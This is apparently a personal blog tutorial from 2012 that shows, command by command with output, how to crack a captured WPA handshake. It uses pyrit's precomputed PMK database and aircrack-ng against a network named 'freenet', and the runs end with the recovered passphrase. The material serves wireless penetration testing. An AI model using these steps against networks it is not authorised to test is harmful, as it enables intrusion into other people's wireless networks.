cracking WPA using pyrit and or aircrack-ng

cracking WPA using pyrit and or aircrack-ng
+==========================================================+
in this blog post I will document how to recover a WPA passphrase used to secure
a wireless access point using pyrit and or aircrack-ng for increased SPEED.
There are lots of documentations about the same out there but this is for quick reference
if I ever need it agently.

assumptions:
++++++++++++++++
[1] This assumes you know what aircrack-ng is,you know what pyrit is and you have installed in your machine
with CUDA support.
if not kindly refer to the below links:
pyrit project: http://code.google.com/p/pyrit/
aircrack-ng: http://www.aircrack-ng.org/
[2]You have been able to capture WPA handshake and you have it stored in a capture file. if not refer to aircrack-ng

procedure:
++++++++++++++++

benchmark:
++++++++++++++++
let’s do a benchmark and see what we have

root@thinkpad:~# pyrit benchmark
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (826.7 PMKs/s)... \

Computed 826.67 PMKs/s total.
#1: 'CUDA-Device #1 'Quadro NVS 140M'': 515.6 PMKs/s (RTT 3.1)
#2: 'CPU-Core (SSE2)': 393.8 PMKs/s (RTT 3.4)

yes I have a GPU look at the ‘CUDA-Device’ not so powerful but a GPU anyway 🙂

analyzing:
++++++++++++
for a second we analyze our capture file before we proceed (the capture was done using airodump-ng).

root@thinkpad:~# pyrit -r wpa_capture-01.cap analyze
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'wpa_capture-01.cap' (1/1)...
Parsed 15 packets (15 802.11-packets), got 1 AP(s)

#1: AccessPoint 00:25:86:b4:a5:3e ('freenet'):
#1: Station 00:c0:ca:36:79:22
#2: Station 00:21:5c:7e:2b:5d, 1 handshake(s):
#1: HMAC_SHA1_AES, good, spread 1

Pyrit has successfuly gone through the capture file and found one AccessPoint with BSSID 00:25:86:b4:a5:3e and ESSID ‘freenet’ and two Stations communicating with that AccessPoint. The key-negotiation (known as the fourway-handshake) between the Station with MAC 00:21:5c:7e:2b:5d and the AccessPoint has also been recorded in the capture file. We can use the data from this handshake to guess that password that is used to protect the network

NB: it is important to note here that pyrit can comfortably handle gzip-compressed dump files either as output or input

since everything seems to work O.K lets now make use of the powerful pyrit feature of databases use:
guessing the password used in a WPA(2)-PSK key-negotiation is a computational-intensive task.
this is usually due to the computation of a “Pairwise Master Key”, a 256-bit key derived from the ESSID and a password/passphrase using the PBKDF2-HMAC-SHA1-algorithm.
for more on PBKDF2-HMAC-SHA1-algorithm
check out
http://www.ietf.org/rfc/rfc2898.txt for PBKDF2
http://www.ietf.org/rfc/rfc2104 for HMAC
http://www.ietf.org/rfc/rfc3174.txt for SHA1

so where does pyrit come in then?
pyrit can store ESSIDs, passwords/passphrases and their corresponding Pairwise Master Keys in a database
this becomes valueable to have the pre-computed tables of Pairwise Master Keys and ESSIDs.
this dramaticaly reduces the amount of time needed to recover/guess this password since the hardest part has been done.
“the computetion of Pairwise Master Key”

populating our database with wordlists:
+++++++++++++++++++++++++++++++++++++++

NB:pyrit can use filesystem-based storage (‘file://’ which is the default) as well use most SQL-databases
these are some supported databases: SQLite (I have tested),postgreSQL and mySQL

so how do we import our wordlist?

root@thinkpad:~# pyrit -i /pentest/passwords/wordlists/darkc0de.lst import_passwords
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
1707657 lines read. Flushing buffers.... ..
All done.

pretty simple and our database is populated
-i is the wordlist we want to import
but wait those are just the possible passwords so we need to add an ESSID (our network name)
‘freenet’ in our case.
how?

root@thinkpad:~# pyrit -e freenet create_essid
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
Created ESSID 'freenet'

finally we run pyrit’s eval just to see what we have in there.

root@thinkpad:~# pyrit eval
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
Passwords available: 993932

ESSID 'freenet' : 0 (0.00%)

wait, pyrit read just below a million passwords in our wordlist ?
we saw “1707657 lines read. Flushing buffers…. ..” from import_password command
but ‘eval’ shows “Passwords available: 993932” only!
why ?
yes pyrit automatically filters passwords that are not suitable for WPA(2)-PSK and also sorts out duplicates when populating the database for the obvious reasons.

batch_processing:
++++++++++++++++

now with our ESSID and a couple of words in our database lets batch-process them.
here pyrit will take our ESSID ‘freenet’ and combine with each passphrase in the word list, compute the corresponding Pairwise master Keys and simply store them.

NB. note that our ESSID is just but a variable we can get rid of at will
e.g with the commands

root@thinkpad:~# pyrit -e freenet delete_essid

or

root@thinkpad:~# pyrit -e freenet create_essid

we can create or delete a given ESSID from the database

back to batching.

this MIGHT chew some time as well as your system resources for this I promise (depending on your system)
but personaly I think it’s worth given the time you will wait when computing the pairwise master keys on the fly.
e.g lets say you are going for a wireless pentest day two then you can leave this precomputing at night since you have the ESSIDs from the reccon with you and thats all you need.

root@thinkpad:~# pyrit batch
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
Working on ESSID 'freenet'
Processed all workunits for ESSID 'freenet'; 1335 PMKs per second.

Batchprocessing done.

after a not so long wait the batch is done
so lets use our new database to recover the password.

root@thinkpad:~# pyrit -r wpa_capture-01.cap attack_db
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
Parsing file 'wpa_capture-01.cap' (1/1)...
Parsed 15 packets (15 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:25:86:b4:a5:3e ('freenet') automatically.
Attacking handshake with Station 00:21:5c:7e:2b:5d...
Tried 721189 PMKs so far (72.7%); 511478848 PMKs per second.

The password is 'What's New? the collected adventures of Phil & Dixie'.

c00l in a blink of an eye we have recovered the passphrase it is “What’s New? the collected adventures of Phil & Dixie”
this happened in less than a second look at this
‘Tried 721189 PMKs so far (72.7%); 511478848 PMKs per second’
from the output
we had just a million passwords in our database but pyrit is doing 511478848 PMKs per second meaning it would have still gonethrough our list in below a second and don’t forget I am only armed with a tiny GPU and pair of CPU cores.
so imagine the potential with a good piece hardware.

aircrack-ng:
+++++++++++++

another one of the cool pyrit features is to export its own database to cowpatty compatible or airolib-ng like database
which can be used with aircrack-ng or cowpatty

so lets see how

root@thinkpad:~# pyrit -o export.hashdb export_hashdb
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'... connected.
The database 'export.hashdb' seems to be uninitialized.
Trying to create default table-layout... Tables created...
Writing passwords...
Wrote 993932 lines...
Writing ESSIDs and results...
Writing 'freenet'...
Wrote 993932 lines...
All done.

here -o specifies the output file you want you want to write to

then lets use aircrack-ng and give it the exported db

root@thinkpad:~# aircrack-ng -r export.hashdb wpa_capture-01.cap
Opening wpa_capture-01.cap
Read 521 packets.

# BSSID ESSID Encryption

1 00:25:86:B4:A5:3E freenet WPA (1 handshake)

Choosing first network as target.

Opening wpa_capture-01.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:03] 208173 keys tested (69091.19 k/s)

KEY FOUND! [ What's New? the collected adventures of Phil & Dixie ]

Master Key : 67 87 00 46 FB 05 58 50 97 39 DD AE 9F EE 6A 63
68 32 13 F1 77 66 CD B9 81 36 D5 6C DE 82 8F 88

Transient Key : AA 7E 97 98 FF 50 81 34 06 2F 0C 58 2C 00 CD 9C
DF AE 00 1E 8E 79 80 AF 96 02 FE B2 71 50 C2 7F
A7 20 57 DE 14 75 1D F9 2D 70 78 02 25 9C 9A BB
38 6F 7A 5E A8 E8 E9 6E A0 D9 C8 B3 58 0E 03 DB

EAPOL HMAC : 28 FB 3F EE 71 A8 40 AA F5 E9 B4 79 59 ED 65 4E

Quitting aircrack-ng...

in 3 seconds we have our passphrase

so what the point of all this?

the answer is simply SPEED

for example aircrack-ng given a raw wordlist will take longer.

root@thinkpad:~# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst wpa_capture-01.cap
Opening wpa_capture-01.cap
Read 521 packets.

# BSSID ESSID Encryption

1 00:25:86:B4:A5:3E freenet WPA (1 handshake)

Choosing first network as target.

Opening wpa_capture-01.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:03:16] 258536 keys tested (1319.50 k/s)

KEY FOUND! [ What's New? the collected adventures of Phil & Dixie ]

Master Key : 67 87 00 46 FB 05 58 50 97 39 DD AE 9F EE 6A 63
68 32 13 F1 77 66 CD B9 81 36 D5 6C DE 82 8F 88

Transient Key : AA 7E 97 98 FF 50 81 34 06 2F 0C 58 2C 00 CD 9C
DF AE 00 1E 8E 79 80 AF 96 02 FE B2 71 50 C2 7F
A7 20 57 DE 14 75 1D F9 2D 70 78 02 25 9C 9A BB
38 6F 7A 5E A8 E8 E9 6E A0 D9 C8 B3 58 0E 03 DB

EAPOL HMAC : 28 FB 3F EE 71 A8 40 AA F5 E9 B4 79 59 ED 65 4E

and here we had to wait 3+ mins thus the obvious advantage of using a database.

pyrit with databases:
+++++++++++++++
as mentioned earlier you make use of SQL databases instead of file based database
but its good to note that you will need SQLAlchemy
refer to http://www.sqlalchemy.org/

so how do you use a database instead

just add -u option and give your database driver and the database file which will be created automaticaly (SQLite)

root@thinkpad:~# pyrit -u sqlite:///my_pyrit.db -i /pentest/passwords/wordlists/darkc0de.lst import_passwords

one advantage of using a database I liked (though never tested it)
is the ability to have several pyrit-clients connect to the same database at the same time over the network

NOTE:
[1]
there are so many options you can play with given these tools so many. Just time and look at them and get used to the man
command as well as the –help option there is pretty much to these tools.

[2]
aircrack-ng can be compiled to make use of your GPU but this was pyrit’s day out 🙂

name:ch1m3ra

2012

02/01

CATEGORY

Uncategorized

Write comment